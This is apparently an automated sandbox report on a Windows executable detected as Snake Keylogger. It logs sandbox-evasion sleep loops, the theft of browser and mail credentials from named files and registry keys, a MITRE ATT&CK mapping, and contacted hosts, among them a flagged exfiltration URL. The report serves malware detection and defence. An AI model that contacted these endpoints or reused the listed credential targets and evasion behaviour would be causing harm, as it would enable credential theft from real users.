Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595295	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Window / User API: threadDelayed 7163			Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Window / User API: threadDelayed 2691			Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 5896	Thread sleep count: 7163 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 5896	Thread sleep count: 2691 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -599672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -599453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -599343s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -599234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -599125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -599015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -598797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -598250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -598140s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -597375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -596718s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -596499s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -596390s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -596062s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -595953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -595843s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -595734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -595625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -595515s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -595406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -595295s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -595187s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -594734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe TID: 4428	Thread sleep time: -594625s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595295	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 594734	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Thread delayed: delay time: 594625	Jump to behavior

Source: Zarefy4bOs.exe, 00000000.00000002.4458012480.0000000000A75000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlls

Source: C:\Users\user\Desktop\Zarefy4bOs.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe

Code function: 0_2_02767988 LdrInitializeThunk,

0_2_02767988

Source: C:\Users\user\Desktop\Zarefy4bOs.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Queries volume information: C:\Users\user\Desktop\Zarefy4bOs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Zarefy4bOs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: Zarefy4bOs.exe, type: SAMPLE
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Zarefy4bOs.exe	File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\			Jump to behavior
Source: C:\Users\user\Desktop\Zarefy4bOs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match	File source: Zarefy4bOs.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: Zarefy4bOs.exe, type: SAMPLE
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0.0.Zarefy4bOs.exe.420000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1993481887.0000000000422000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4461938228.0000000002881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Zarefy4bOs.exe PID: 3648, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 Query Registry	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Security Software Discovery	Remote Desktop Protocol	11 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	1 System Network Configuration Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	13 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Zarefy4bOs.exe	66%	ReversingLabs	ByteCode-MSIL.Keylogger.NotFound
Zarefy4bOs.exe	68%	Virustotal		Browse
Zarefy4bOs.exe	100%	Avira	HEUR/AGEN.1307591
Zarefy4bOs.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
reallyfreegeoip.org	1%	Virustotal	Browse
scratchdreams.tk	6%	Virustotal	Browse
checkip.dyndns.com	0%	Virustotal	Browse
checkip.dyndns.org	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.org/	0%	URL Reputation	safe
http://checkip.dyndns.org/q	0%	URL Reputation	safe
http://reallyfreegeoip.org	0%	URL Reputation	safe
https://reallyfreegeoip.org	0%	URL Reputation	safe
http://checkip.dyndns.org	0%	URL Reputation	safe
http://checkip.dyndns.com	0%	URL Reputation	safe
https://reallyfreegeoip.org/xml/	0%	URL Reputation	safe
https://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk/_send_.php?TS	100%	Avira URL Cloud	malware
https://reallyfreegeoip.org/xml/102.129.152.231$	0%	Avira URL Cloud	safe
https://reallyfreegeoip.org/xml/102.129.152.231	0%	Avira URL Cloud	safe
http://scratchdreams.tk	100%	Avira URL Cloud	malware
https://scratchdreams.tk/_send_.php?TS	1%	Virustotal		Browse
https://scratchdreams.tk	15%	Virustotal		Browse
http://scratchdreams.tk	6%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
us2.smtp.mailhostbox.com	208.91.199.225	true	false		high
reallyfreegeoip.org	104.21.67.152	true	false	1%, Virustotal, Browse	unknown
scratchdreams.tk	104.21.27.85	true	false	6%, Virustotal, Browse	unknown
checkip.dyndns.com	193.122.6.168	true	false	0%, Virustotal, Browse	unknown
checkip.dyndns.org	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://scratchdreams.tk/_send_.php?TS	false	1%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://reallyfreegeoip.org/xml/102.129.152.231	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://us2.smtp.mailhostbox.com	Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002B58000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	Zarefy4bOs.exe	false	URL Reputation: safe	unknown
https://scratchdreams.tk	Zarefy4bOs.exe	false	15%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://reallyfreegeoip.org	Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.000000000295C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org	Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002935000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002987000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A3B000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A2C000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002944000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029F2000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.0000000002A0D000.00000004.00000800.00020000.00000000.sdmp, Zarefy4bOs.exe, 00000000.00000002.4461938228.00000000029D3000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
